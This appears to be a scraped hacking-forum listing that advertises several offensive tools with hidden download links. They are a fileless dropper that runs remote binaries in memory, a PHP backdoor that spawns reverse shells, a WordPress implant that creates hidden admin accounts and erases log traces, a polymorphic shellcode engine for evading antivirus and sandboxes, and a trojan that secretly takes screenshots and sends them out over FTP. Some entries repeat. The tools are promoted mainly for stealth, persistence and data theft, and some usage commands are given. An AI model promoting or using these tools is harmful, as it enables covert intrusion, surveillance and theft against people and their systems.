Search the Community

Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine Short story fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk simple usage fileless-xec <binary_url> execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url> retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url> detach program execution from tty: setsid fileless-xec […] Changelog v3.1 Add icmp server: Transfer binary content with ICMP (used QueenSono) stdout and stdin in real-time for “unstealth” mode stdout in real time for windows executable [hide][Hidden Content]]

fileless-xec – A stealth dropper Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine Short story fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk simple usage fileless-xec <binary_url> execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url> retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url> detach program execution from tty: setsid fileless-xec […] 3.0.0 Latest Changed Rebranding from curlNexecto fileless-xec Added Self remove of fileless-xec dropper Server mode Windows support Exec without using memfd syscall [hide][Hidden Content]]

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes. Features Efficient: More than 20 plugins to automate post-exploitation tasks Run commands and browse filesystem, bypassing PHP security restrictions Upload/Download files between client and target Edit remote files through local text editor Run SQL console on target system Spawn reverse TCP shells Stealth: The framework is made by paranoids, for paranoids Nearly invisible by log analysis and NIDS signature detection Safe-mode and common PHP security restrictions bypass Communications are hidden in HTTP Headers Loaded payloads are obfuscated to bypass NIDS http/https/socks4/socks5 Proxy support Convenient: A robust interface with many crucial features Detailed help for any command or option (type help) Cross-platform on both the client and the server. Powerful interface with completion and multi-command support Session saving/loading feature & persistent history Multi-request support for large payloads (such as uploads) Provides a powerful, highly configurable settings engine Each setting, such as user-agent has a polymorphic mode Customisable environment variables for plugin interaction Provides a complete plugin development API Changelog v3.1 Implemented enhancements: Make warning message explicit when running plugin in non-connected mode #74 Show stack trace when VERBOSITY is True #73 get help for CMD when calling help CMD ARG #70 unexpected infinite autocompletion #68 help set \<VAR\>: display buffer type description #67 set should inform user that help set \<VAR\> is available #62 alias \<VAR\> None misses verbosity #59 Missing help set \<SETTING\> autocompletion #56 env: Confusing error message before exploited context #53 ./deps/ folder is archaic #41 Fixed bugs: phpsploit is not working properly #128 suidroot plugin makes invalid assumptions #105 crash: IndexError: list index out of range #101 lrun command always returns 0 #83 core.tunnel.exceptions.ResponseError: Php runtime error #81 core: read non-tty STDIN line-by-line #75 term colors: buggy message display #72 corectl display-http-requests: invalid log on POST method #65 alias can override existing command #60 isolate\_readline\_context\(\) don’t isolates readline history #54 Closed issues: Scripting support #138 add jonas lejon as contributor for his blog post #137 corectl display-http-requests not working when PROXY is set #135 I’m sure i set the backdoor file,but i can’t get windows shell again #120 a window shell trate mysql data #119 Doubt about the socks proxy5 #114 INSTALL.md should have install instructions #106 Add contributors list on README #88 help \<PLUGIN\> lacks plugin informations #85 ux: show missing dependency warnings at start #80 [hide][Hidden Content]]

Stealth post-exploitation framework for Wordpress CMS What is it and why was it made? We intentionally made it for our penetration testing jobs however its getting grey hairs now so we thought we would like to pass it on to the public!. ProjectOpal or Opal. Is a stealth post exploit framework for wordpress sites that can hide its trace from logs and obfuscate it's way through the system! 🙂 Fun cool features it creates a admin user that is hidden from all users including admins! just note its stored in the database so don't forget to delete your traces. python Injector.py (Edit the config.py!) You will see a start-up screen. Type help and get to know your shell better 🙂 Features: These are features that Shadowlabs Team prides themself on based on this program: Bypass WAF(Web application firewall) Hidden/Stealth Let's you login to any user Dump entire user entries Create a persistent admin account that is hidden Obfuscated implant Multi-functionality [HIDE][Hidden Content]]

Opal Stealth post-exploitation framework for WordPress CMS What is it and why was it made? We intentionally made it for our penetration testing jobs however its getting grey hairs now so we thought we would like to pass it on to the public!. ProjectOpal or Opal. It is a stealth post exploit framework for wordpress sites that can hide its trace from logs and obfuscate it’s way through the system! 🙂 Fun cool features it creates an admin user that is hidden from all users including admins! just note its stored in the database so don’t forget to delete your traces. Features: These are features that Shadowlabs Team prides themself on based on this program: Bypass WAF(Web application firewall) Hidden/Stealth Let’s you login to any user Dump entire user entries Create a persistent admin account that is hidden Obfuscated implant Multi-functionality [HIDE][Hidden Content]]

MorphAES IDPS & SandBox & AntiVirus STEALTH KILLER. MorphAES is the world's first polymorphic shellcode engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent. Properties: Polymorphism (AES encryption) Metamorphism (logic and constants changing) Platform independent (Linux/BSD/Windows) IDPS stealthing (the total number of possible signatures is more the number of atoms in the universe for one given code) Sandbox evasion (special assembly instructions) Bad characters avoiding (\x00, \x04, \x05, \x09, \x0a, \x20) Can produce executables and be exploited remotely Input code can have arbitrary length Possibility for a NOP sled Dependencies for the morpher: Python 2.7 - main engine Dependencies for the code execution: 64-bit Intel AES-NI - for decryption Nonetheless, there are some limitations (aka white-hat aspects): Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily) Unicode null bytes might still work (but who cares?) It will only work on 64-bit Intel processors with AES-NI support, but since all the user's PCs (like Pentium, Celeron, i3, i5, i7) and the industry's servers (like Xeon) have it, it's more a specification, rather than a limitation, thus a 32-bit implementation is unpractical Almost any shellcode is guarantee to work however, an arbitrary code doesn't (to avoid malware abuse) Windows/BSD PoC and executables are in progress, as well as the ARM version How it works Shellcode padding with NOPs (since AES is a block cipher) and adding an optional NOP sled Shellcode encryption with a random key using custom AES-128-ECB (not the best, but the simplest) - polymorphism Constants randomization, logic changes, instructions modification and rewriting - metamorphism HowTo You will have to assemble my custom AESNI-128-ECB implementation using an Intel x64 CPU and put it in the same folder with the python script. For Linux: sudo apt-get install python as --64 AES.s -o AES.o ld AES.o -o AES Execute the Python script and enter your shellcode or nothing for a default Linux shell. You can specify your own execution address as well. It is also possible to build and execute on Windows/BSD/Mac, but I'm still testing it. You can test the Linux PoC in assembly: as --64 shellcodePoC.s -o shellcodePoC.o ld shellcodePoC.o -o shellcodePoC ./shellcodePoC or in 😄 gcc -m64 -fno-stack-protector -z execstack shellcode.c -o shellcode ./shellcode Every file is commented and explained Tests At this point, it should be pretty obvious that, the hashes would be different every time, but let's compare SSDEEPes of 2 Linux executables of the same shellcode: 96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh, 96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh, Well, there's something in common, but globally those are 2 different signatures, now what about the shellcode it-self: 6:Cq8bnJYn4Xkm3qECaADATyEnT8snTiETiTCfhUaAP6mYGexCKdKZzX+rqVCKdKTc:xuJ0Zp2xRZof79G/KVyk/KTbA, 6:vrg+T1RfLEQD/zD1DZzDJ3zDBfjDcDRJDULUwzWq0Cgk3g4zE/Yq0Cgk3gy12Ots:vLjjEszWCp3w/YCp3Nts, Almost totally different signatures for the same morphed shellcode! At the publication date, the executable was detected as a shellcode only by 2 out of 53 antiviruses (AVG and Ikarus) on virustotal, but now, it just fails to analyze. malwr and cuckoo2 don't see anything suspicious. On the reverser's perspective, IDA won't see anything either. Radare2 would show the real instructions only if assembled by the assembler it-self however, it doesn't detects any crypto or suspicious activity for the executable. Althrough, I didn't test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly... To put it in the nutshell Basically, it can transform a script-kid's code (or a known-one) into a zero-day. IDPS will fail because, it's almost impossible to make a signature and difficult to make a regular expression or heuristic analysis. Most of the sandboxes doesn't use Intel's AES-NI instructions directly, so they will not execute the code, so "everything is fine" for them, whereas it's not. The only way to defeat this type of shellcode is to use an appropriate sandboxing or/and an AI. Of course DEP/NX/CANARY/ASLR should work as well. Notice that, the whole execution is done by a pure assembly, no Python (or OpenSSL) is needed for the shellcode's execution since, I use built-in assembly instructions only, thus it's system-independent (surely, you will have to assemble it for each-one by adapting the instructions/opcodes, but they are still same). Notes This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP. IDPSes and sanboxes are the past. Jiddu Krishnamurti Download: [HIDE][Hidden Content]]

Stealth Screenshot Saver + Uploader is a combination of windows utilities to create a malicious program without requiring any heavy coding. The executable file contain: file.bat - Batch file contains the screenshot batch line + ftp credentials main.exe - Execute the hidden file.bat README.txt - dummy file with credits svchost.exe - Command line utility to take screenshots How to use? Open file.bat with notepad and change line 2, 4, 5, 6. In line 2, change between loop and savescreenshot. The first value is by default 60 (60 screenshots before upload) Also in the same line by default is 10000 (Wait 10 seconds between screenshots) In line 4 is the ftp server (Default is ftp.uploaded.net) In line 5 is the ftp username In line 6 is the ftp password Why Uploaded.net Uploaded.net is a public free file hosting service with ftp enabled by default. The advantage of Uploaded.net is that you can share the username and password in plain text and if anyone grab it and try to access the files it won't be possible to modify or delete without confirming by email. Developed using the following Technologies WinRAR, Q Compiler, UPX, Simple Batch Example Download: [Hidden Content] Virustotal: [Hidden Content]

This archive is the research for a trojan that takes screenshots from the system and upload to server. All hidden/stealth from the user. Features: 1) Custom server login (IP/Domain, Username, Password) 2) Custom number of screenshots to take 3) Upload to the server by FTP Download: [Hidden Content].rar Virustotal: [Hidden Content]